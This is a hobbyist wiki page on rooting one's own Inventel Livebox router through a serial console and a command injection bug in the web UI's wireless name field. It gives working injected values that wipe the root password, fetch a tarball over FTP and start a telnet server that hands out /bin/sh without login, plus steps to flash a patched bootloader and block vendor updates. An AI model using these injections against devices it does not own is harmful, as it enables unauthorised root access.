livebox:commandlineaccess

Livebox Command line Access

At this point you have downgraded your Livebox to firmware 5.04 and it's on your network with an IP of 192.168.1.1 what we need to do next is exploit a bug in its webserver so we can get to the command line.
If the IP address 192.168.1.1 collides with an existing piece of equipment on your network it's advisable to cable from your development computer directly to the Livebox, otherwise you are going to have all sort of problems with this phase.

The Inventel Livebox box has a root password that isn't known, so how can you get to a shell prompt?

There are two methods to breaking into your livebox

Serial port access requires additional console_access_hardware which you can build or buy from us.
If you intend on doing any development work on the Livebox this is an essential piece of kit.

Both these methods exploit a bug in a specific version of the Livebox firmware.

If your firmware version is not 5.04-uk then you need to first downgrade to this release which still has the webserver exploit.

telnet console serial mmj

Don't:

  • Pay £4.99 for a Max3232 at Maplins
  • Try to find that elusive MMJ connector
  • Spend £50 on an MMJ crimp tool
  • Waste your precious time fiddling around with a soldering iron & a piece of veroboard
  • Get the wiring wrong & fry your Livebox

Do:

This cable terminates in an MMJ connector at one end and has a female DB9 RS232 connector at the other. All ready to go - no external power supply needed. Just plug in, set your terminal emulator program to 115200baud, 8 data bits, 1 stop bit and you are connected to the Busybox serial console. Supplied as three parts.

  1. an MMJ to RJ11 cable
  2. a PCB that holds the Max3232cpe device & has RJ11 and RJ45 connectors, caps & diodes
  3. an original Cisco console cable (worth £5 alone) RJ45 to DB9

We don't provide a case for the PCB - this is left as an exercise for the reader (some, less fussy, readers simply wrap the entire PCB with insulating tape). Be sure not to allow the PCB to touch metal objects - 5VDC is present on the PCB.

p1000649.jpg p1000650.jpg Livebox Console Serial PCB

We have purpose designed a board that you can buy. See Console_Access_Hardware

cimg1759.jpg Making an RS232 adaptor. Crimped up a RJ11 6P6C onto a piece of cat5 cable. Repurposed a PCB which has a Max232 onboard to do the hookup. N.B. The chip needed for this convertor is the MAX3232 - this works at 3.3V (costs rather more than a MAX232 - tried a MAX232, it doesn't work). Turns out that the serial port socket on the Livebox isn't a 'standard' RJ11 connector - it is a MMJ connector with the retaining clip offset from the centre of the socket - a standard RJ11 needs to have its clip cut off to allow the connector to enter. This gives 'reduced' insertion force, but there is a slight resistance - just enough to keep the connector in place - not great for permanent setups.

2786661562_8513d3cb3b_m.jpg

On the PCB, there are solder pads for an RJ11 style socket - but no socket is populated on the board. It was hoped that this might expose a second serial port, but this is not the case.

When connected at 115200 Baud, No Parity , 8 Data Bits , 1 Stop Bit we are presented with a Login prompt. w00t! But we are asked for a root password. Doh!

So now getting in is going to be so much easier. Just change the Livebox Name (in browser UI menu Configuration→Advanced→Wireless) to each of the following in sequence: This works with UK firmware: 5.04.3. We only have 32 characters to play with in the wireless name so it must be entered as seen.

First change the livebox hostname to what is below and Save.

;echo root::0:0:::/bin/sh>/tmp/x

Then change the livebox hostname to what is below and Save.

;cp /tmp/x /etc/passwd

Fire up your trusty serial console program: putty, teraterm, hyperterm or whatever.

I now have an etc.tar that lives on my FTP server so once I'm in I just

Please press Enter to activate this console.

WANADOO-ECD0 login: root
No directory, logging in with HOME=/


BusyBox v0.60.4 (2003) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cd /etc
# wget ftp://192.168.1.12/etc.tar
# tar xvf etc.tar
utelnetd
init.d/telnetd
rc2.d/S35telnet
rc1.d/S35telnet
# /etc/init.d/telnetd start
telnetd: starting
  port: 23; login program: /bin/sh
#

Of course once I'm in via the serial port I don't need to even bother with setting up a TELNETD server I could just cut straight to the chase and fetch the new RedBoot loader and flash it.

# cd /tmp
# wget ftp://192.168.1.12/redboot_blueg5.6-patched
# fcp -v redboot_blueg5.6-patched /dev/mtd0

There are a number of sites that give instructions on hacking in. This is a slightly modified version of what you'll normally find.

Connect an Ethernet patch cable to the yellow port on the Livebox & browse to

http://admin:admin@192.168.1.1

The next part of the process uses a 'backdoor' settings on the Livebox web server. These work in conjunction with an ftp server running on the PC that is connected to the Livebox. Since the Livebox runs Busybox, the 'wget' command is available to allow files to be pulled onto the Livebox via ftp. So setup an ftp server on your PC (we used FileZilla Server on Windoze) & enable 'anonymous' access. If this is the first time that you have configured an ftp server, you will need to read and understand the user-guide for your ftp server before proceeding. Also note that if you are running Vista, you will want to run the ftp server as the 'admin' user.

1. On the Livebox browser UI, in 'Configuration→Advanced→Network', change the LAN IP address to be 10.0.0.1

2. Configure the other options to suit, deselect 'Enable DHCP Server' and select Submit and Apply the configuration. The Livebox will now automatically reboot.
inventel.jpg

3. Now change the IP address of your PC to 10.0.0.2 and make the gateway 10.0.0.1
inventel2.jpg

4. Download etc.tar into the FTP area on your PC and rename this file as u. We do this because we only have a limited number of characters available to us in the field we are using for the backdoor hack.

For info, here is what the tarfile contains:

$ tar tvf etc.tar
-rwxrwxrwx root/root     18304 1970-01-01 01:00 utelnetd
-rwxr-xr-x root/root       145 1970-01-01 01:06 init.d/telnetd
lrwxrwxrwx root/root         0 1970-01-01 01:02 rc2.d/S35telnet -> ../init.d/telnetd
lrwxrwxrwx root/root         0 1970-01-01 01:02 rc1.d/S35telnet -> ../init.d/telnetd

5. In Configuration→Advanced→Wireless, change Livebox Name to

;cd /etc;wget ftp://10.0.0.2/u

and select Submit and then Apply the configuration.

Check your FTP logs (on the PC).

On FileZilla, this looked like

000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> Connected, sending welcome message...
(000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220-FileZilla Server version 0.9.34 beta
(000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220-written by Tim Kosse (Tim.Kosse@gmx.de)
(000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220 Please visit http://sourceforge.net/projects/filezilla/
(000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> USER anonymous
(000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 331 Password required for anonymous
(000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> PASS ******
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 230 Logged on
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> SYST
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 215 UNIX emulated by FileZilla
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> PWD
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 257 "/" is current directory.
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> TYPE I
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 200 Type set to I
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> PORT 10,0,0,1,12,1
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 200 Port command successful
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> RETR u
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 150 Opening data channel for file transfer.
(000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 226 Transfer OK
(000001) 21/05/2010 11:11:42 - anonymous (10.0.0.1)> disconnected.

6. Now, in 'Configuration→Advanced→Wireless', change the Livebox Name to

;cd /etc; tar xf u

and select Submit and then Apply the configuration. The Livebox will now reboot.

This will install the telnetd and startup scripts. However those scripts only run on system startup. So you need to change your Livebox name one more time (to something meaningful) to cause another reboot.

This will now start the Telnet server and you should be able to connect and login to the Livebox by typing 'telnet 10.0.0.1' at a command prompt on the PC.

You should see something like this ..

BusyBox v0.60.4 (2003) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# ls
Image          etc_ro_fs      linuxrc        sbin           webs
bin            flasher        mnt            tmp
dev            home           proc           tmp_ro_fs
dev_update.sh  home_ro_fs     root           usr
etc            lib            root_ro_fs     var
#

If you find that you cannot access the Livebox via telnet, try unplugging/re-plugging power to the unit at this stage. Then re-try the telnet connection.

At this point, if you are working towards loading the HAH firmware, just skip to here to find out how to replace the RedBoot loader.

Alternatively, if you want to play about with the Busybox unix environment, carry out step 7.

7. Stopping 'phone home' behaviour. To prevent the Livebox finding it's way out to autoupdate, do the following. Look in /etc - you should see files 'autoconf.conf' and 'firm.conf'. Note that autoconf.conf is a symbolic link to a read only part of the filesystem. We need to make this an editable file.

# cp autoconf.conf autoconf.conf1
#
# ls -la aut*
lrwxrwxrwx    1 0        0              24 Jan  1 00:00 autoconf.conf -> /etc_ro
_fs/autoconf.conf
-rw-r--r--    1 0        0            2718 Jan  1 00:41 autoconf.conf1
#
# rm autoconf.conf
#
# mv autoconf.conf1 autoconf.conf
#

Then use vi to edit 'autoconf.conf'. Change the following two lines

CONFIG_DEFAULT_UPDATE_MACHINE="developers.inventel.com"

CONFIG_FT_SERVER_KIT_URL="http://suivilb.wanadoo.fr/servlets/maj"

to

CONFIG_DEFAULT_UPDATE_MACHINE="10.0.0.200"

CONFIG_FT_SERVER_KIT_URL="http://suivilb.wanadoo.f/servlets/maj"

and save.

Do the same fix to 'firm.conf' - it is a file, not a symlink, so you don't need to recreate it.

This should stop all autoupdates.

Having connected a terminal to the Livebox serial port, we can see the output that is generated whilst the unit boots up.

@AABCBCCCC9655432SDRAM16bitX10120123456+78ESA: 00:07:3a:f9:0f:02
WEP KEY : E34E08C16FEAF50B985959B74B
Ethernet eth0: MAC address 00:07:3a:f9:0f:02
IP: 10.7.58.112, Default server: 0.0.0.0
Hardware version 0x0A BLUE5G.6 WITHOUT OPTION
Factory Settings Recovery Switch OFF

RedBoot(tm) bootstrap and debug environment [ROM]
Non-certified release, version release-wanadoo-fr - built 17:05:34, Aug  2 2005

Platform: Blue_5g (MIPS32 4Kc)
Copyright (C) 2000, 2001, 2002, Red Hat, Inc.

RAM: 0x80000000-0x81000000, [0x80434720-0x80fe2000] available
FLASH: 0xbe400000 - 0xbec00000, 128 blocks of 0x00010000 bytes each.
== Executing boot script in 0.200 seconds - enter ^C twice to abort
RedBoot> fis load -b 0x80010000 -m cramfs -f Image user_fs
Looking for Image in cramfs user_fs partition
cramfs_load : b 0x80010000, c 0xBE430000, s 0x00720000, f Image
.............loaded 0x1900FC bytes

RedBoot> exec -c "boot_loader=RedBoot root=1F01 mem=16M" 0x80010000
Now booting linux kernel:
 Base address 0x8000fc00 Entry 0x80010000
 Cmdline : boot_loader=RedBoot root=1F01 mem=16M
arcs_cmdline: boot_loader=RedBoot root=1F01 mem=16M
Boot loader : REDBOOT
 prom init
CPU revision is: 00029107
Primary instruction cache 16kb, linesize 16 bytes (2 ways)
Primary data cache 8kb, linesize 16 bytes (2 ways)
Linux version 2.4.17 (bfo@bfo) (gcc version 3.2.2) #1 Tue Sep 20 16:56:45 CEST 2
005
Determined physical RAM map:
 memory: 00fa0000 @ 00000000 (usable)
User-defined physical RAM map:
 memory: 00fa0000 @ 00000000 (usable)
On node 0 totalpages: 4000
zone(0): 4000 pages.
zone(1): 0 pages.
zone(2): 0 pages.
Kernel command line: boot_loader=RedBoot root=1F01 mem=16M
bcm_console_setup
Calibrating delay loop... 254.77 BogoMIPS
Memory: 13812k/16000k available (1429k kernel code, 2188k reserved, 96k data, 60
k init, 0k highmem)
Dentry-cache hash table entries: 2048 (order: 2, 16384 bytes)
Inode-cache hash table entries: 1024 (order: 1, 8192 bytes)
Mount-cache hash table entries: 512 (order: 0, 4096 bytes)
Buffer-cache hash table entries: 1024 (order: 0, 4096 bytes)
Page-cache hash table entries: 4096 (order: 2, 16384 bytes)
Checking for 'wait' instruction...  unavailable.
POSIX conformance testing by UNIFIX
mpi: No Card is in the PCMCIA slot
PCI: Fixing up bus 0
Linux NET4.0 for Linux 2.4
Based upon Swansea University Computer Society NET3.039
Initializing RT netlink socket
Starting kswapd
JFFS2 version 2.1. (C) 2001 Red Hat, Inc., designed by Axis Communications AB.
pty: 256 Unix98 ptys configured
brcmboard: brcm_board_init entry
New led 8, mask : 0x00000001
New led 0, mask : 0x00000002
New led 9, mask : 0x00000004
New led 6, mask : 0x00000008
New led 1, mask : 0x00000010
Module bcm63xx_cons.c v1.0
date: Sep 20 2005 time: 16:56:56 - FPERIPH:50000000
block: 64 slots per queue, batch=16
PPP generic driver version 2.4.1
DBW flash: probing 16-bit flash bus
Physically mapped flash: Probing for AMD compatible flash...
mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002210, dev_id3 0x00002200
Found AMD AM29BDS643D
table[i] : mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002202, dev_id3 0x0
0002200, long_dev_id 1
Found AMD AM29LV640MB
table[i] : mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002210, dev_id3 0x0
0002200, long_dev_id 1
Found AMD AM29LV640MB
Physically mapped flash: Found 1 x 8MiB AMD AM29LV640MB at 0x0
mtd_info :
type 3, size 0x00800000, erasesize 0x00010000, name Physically mapped flash, ind
ex 0, numeraseregions 3
mtd_info->priv : amd_flash_private : device_type 2, interleave 1, numchips 1, ch
ipshift 23<5> mymtd is : 80f52120
Support for extended flash memory size : 0x00800000 ; ONLY 64MBIT SUPPORT
RedBoot partition for 64MBit non aligned Flash
RedBoot partition for 64MBit non aligned Flash
RedBoot partition for 64MBit non aligned Flash
RedBoot partition for 64MBit non aligned Flash
RedBoot partition for 64MBit non aligned Flash
Using RedBoot partition definition
Creating 5 MTD partitions on "Physically mapped flash":
0x00000000-0x00030000 : "RedBoot"
0x00030000-0x00750000 : "user_fs"
0x00750000-0x007f0000 : "jffs_system"
0x007f0000-0x007ff000 : "FIS directory"
0x007ff000-0x00800000 : "RedBoot config"
usb.c: registered new driver usbdevfs
usb.c: registered new driver hub
NET4: Linux TCP/IP 1.0 for NET4.0
IP Protocols: ICMP, UDP, TCP, IGMP
IP: routing cache hash table of 512 buckets, 4Kbytes
TCP: Hash tables configured (established 512 bind 1024)
Linux IP multicast router 0.06 plus PIM-SM
NET4: Unix domain sockets 1.0/SMP for Linux NET4.0.
Ebtables v2.0 registered<6>NET4: Ethernet Bridge 008 for NET4.0
VFS: Mounted root (cramfs filesystem) readonly.
Freeing unused kernel memory: 60k freed
init started:  BusyBox v0.60.4 (2003) multi-call binary
Algorithmics/MIPS FPU Emulator v1.5

SYSINIT

INVENTEL version : v5.04.3-uk
<SNIP>
Sysinit done

Please press Enter to activate this console.

WANADOO-0F02 login: root


BusyBox v0.60.4 (2003) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#

Network Access

Now that you are in, to get your Livebox on the local area network, assuming your network Gateway is 192.168.11.1
Adding a default route

# route add default gw 192.168.11.1 dev br0

Specifying a nameserver. Edit /etc/resolv.conf and add the line

nameserver 192.168.11.1
  • livebox/commandlineaccess.txt
  • Last modified: 2013/09/11 18:29
  • by minerva9